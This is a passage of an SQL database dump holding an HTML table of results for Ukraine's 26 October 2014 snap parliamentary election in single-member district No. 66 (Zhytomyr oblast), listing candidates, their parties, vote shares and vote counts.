http://lux-net.com.ua/...',1,9332,'',1,'*','',''),(901,1155,'Результати по одномандатному виборчому округу № 66','rezultati','<table border=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0.75pt;\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">Позачергові вибори народних депутатів України 26 жовтня 2014 року</span></strong><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\"><br /> Cтаном на : 31.10.2014 07:34:00</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 100%;\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0.75pt;\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">Одномандатний виборчий округ №66<br /> </span><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">(Житомирська область)</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 80%; padding: 0.75pt;\" width=\"80%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">Кількість дільниць в окрузі</span></p>\r\n</td>\r\n<td style=\"width: 20%; padding: 0.75pt;\" width=\"20%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">298</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80%; padding: 0.75pt;\" width=\"80%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">% опрацьованих протоколів</span></p>\r\n</td>\r\n<td style=\"width: 20%; padding: 0.75pt;\" width=\"20%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">100.00</span></strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 93%;\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">Кандидат</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">Графік </span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">% ЗА</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">Голосів ЗА</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=8716.html\"><span style=\"color: blue;\">Дзюблик Павло Володимирович </span></a>, Політична партія \"НАРОДНИЙ ФРОНТ\"</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">19.10</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">17 694</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=6657.html\"><span style=\"color: blue;\">Журавський Віталій Станіславович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">13.95</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">12 924</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=7303.html\"><span style=\"color: blue;\">Литвин Іван Володимирович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">11.90</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">11 030</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=7474.html\"><span style=\"color: blue;\">Варивода Валерій Якович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">9.56</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">8 855</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=10359.html\"><span style=\"color: blue;\">Шевченко Євген Сергійович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">8.58</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">7 955</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=9105.html\"><span style=\"color: blue;\">Рябенко Петро Константинович </span></a>, політична партія Всеукраїнське об’єднання \"Батьківщина\"</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">8.51</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">7 885</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=14414.html\"><span style=\"color: blue;\">Бондарчук Дмитро Володимирович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3.82</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3 540</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=10950.html\"><span style=\"color: blue;\">Дубас Віктор Миколайович </span></a>, Радикальна Партія Олега Ляшка</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3.66</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3 390</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=12970.html\"><span style=\"color: blue;\">Сергієнко Петро Миколайович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3.63</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3 365</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=9606.html\"><span style=\"color: blue;\">Русак Василь Степанович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3.52</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3 263</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=8654.html\"><span style=\"color: blue;\">Вареник Олександр Сергійович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1.57</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1 456</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=11258.html\"><span style=\"color: blue;\">Лисенко Олексій Юрійович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1.43</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1 331</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=7385.html\"><span style=\"color: blue;\">Баранівський Василь Федорович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1.34</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1 248</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=10012.html\"><span style=\"color: blue;\">Нагурний Василь Анатолійович </span></a>, Комуністична партія України</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1.27</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1 182</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=9527.html\"><span style=\"color: blue;\">Мойсеєнко Віктор Миколайович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1.07</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1 000</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=7810.html\"><span style=\"color: blue;\">Бірюченко Володимир Львович </span></a>, Партія Сергія Тігіпка \"Сильна Україна\"</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.82</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">760</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=9434.html\"><span style=\"color: blue;\">Остапчук Микола Миколайович </span></a>, Партія \"Справедливість\"</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.76</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">707</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=10347.html\"><span style=\"color: blue;\">Пінський Олег Вікентійович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.74</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">689</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=10354.html\"><span style=\"color: blue;\">Кузнєцов Василь Віталійович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.67</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">622</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=7907.html\"><span style=\"color: blue;\">Яремчук Юрій Юрійович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.63</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">585</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=9374.html\"><span style=\"color: blue;\">Сіньков Віталій Миколайович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.52</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">487</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=7209.html\"><span style=\"color: blue;\">Гук Володимир Миколайович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.45</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">417</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=11251.html\"><span style=\"color: blue;\">Безгласна Анжела Вікторівна </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.41</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">383</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=12187.html\"><span style=\"color: blue;\">Михальчук Юрій Броніславович </span></a>, Політична партія \"Воля\"</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.38</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New 